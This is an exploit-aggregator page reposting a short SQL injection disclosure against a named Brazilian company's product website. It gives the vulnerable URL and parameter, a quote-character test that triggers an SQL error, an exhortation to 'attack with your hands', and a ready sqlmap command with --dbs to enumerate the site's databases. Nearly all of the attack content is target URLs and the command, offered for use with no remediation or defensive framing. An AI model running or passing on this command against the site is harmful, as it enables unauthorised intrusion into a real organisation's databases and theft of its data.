Advertisement






PulsFOG - SQL Injection

CVE Category Price Severity
CVE-2021-33541 CWE-89 $10,000 Critical
Author Risk Exploitation Type Date
Unknown Critical Remote 2021-04-04
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040028

Below is a copy:

PulsFOG - SQL Injection
Hey, on fleek? 

Website : www.pulsfog.com.br
Vulnerability : SQL Injection
Discovered by uRomulou

1 . Go to http://www.pulsfog.com.br/produtos.php?id_cate=1
2 . Test SQL Injection, http://www.pulsfog.com.br/produtos.php?id_cate=1%27
3 . It is return SQL error
4 . To exploit, with tools such as sqlmap or others, or if you know, attack with your hands!

Example with sqlmap : sqlmap --random-agent --url http://www.pulsfog.com.br/produtos.php?id_cate=1 --dbs

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.